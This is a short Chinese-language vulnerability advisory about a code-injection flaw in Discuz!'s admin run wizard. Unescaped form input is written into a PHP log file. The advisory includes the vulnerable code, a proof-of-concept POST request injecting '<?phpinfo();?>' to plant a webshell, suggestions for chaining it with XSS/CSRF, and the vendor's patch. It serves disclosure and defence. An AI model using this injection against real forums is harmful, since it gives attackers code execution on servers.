Discuz! admin/runwizard.inc.php get-webshell bug 's

author: 80vul-A
team:http://www.80vul.com

由于Discuz!的admin/runwizard.inc.php里saverunwizardhistory()写文件操作没有限制导致执行代码漏洞.

一 分析

在文件admin/runwizard.inc.php里代码:

$runwizardhistory = array(); $runwizardfile = DISCUZ_ROOT.'./forumdata/logs/runwizardlog.php'; if($fp = @fopen($runwizardfile, 'r')) { $runwizardhistory = @unserialize(fread($fp, 99999)); fclose($fp); } .......  if(submitcheck('step1submit')) { $runwizardhistory['step1']['size'] = $size; $runwizardhistory['step1']['safe'] = $safe; $runwizardhistory['step1']['func'] = $func; saverunwizardhistory(); } ........  function saverunwizardhistory() { global $runwizardfile, $runwizardhistory; $fp = fopen($runwizardfile, 'w'); fwrite($fp, serialize($runwizardhistory)); fclose($fp); }

上面代码可以看出来当有后台权限时,可以直接得到webshell.如果结合xss[如:SODB-2008-01,SODB-2008-02..等] crsf[如:SODB-2008-03]等漏洞,可以直接通过admin身份远程写入webshell执行代码.

二 利用

poc:

POST /bbs/admincp.php?action=runwizard&step=3 HTTP/1.1 Host: www.80vul.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.80vul.com/bbs/admincp.php?action=runwizard&step=2 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 207  formhash=a1ae055f&anchor=&settingsnew%5Bbbname%5D=%3C%3Fphpinfo%28%29%3B%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%CF%C2%D2%BB%B2%BD

webshell:

http://www.80vul.com/bbs/forumdata/logs/runwizardlog.php

三 补丁[fix]

今天发布的dz7 bt版本[1]已经fix这个漏洞了:

function saverunwizardhistory() { global $runwizardfile, $runwizardhistory; $fp = fopen($runwizardfile, 'w'); $s = '<?php exit;?>'; $s .= serialize($runwizardhistory); fwrite($fp, $s); fclose($fp); }

[1]:http://download.comsenz.com/Discuz/7.0.0Beta/Discuz_7_Beta_SC_GBK.zip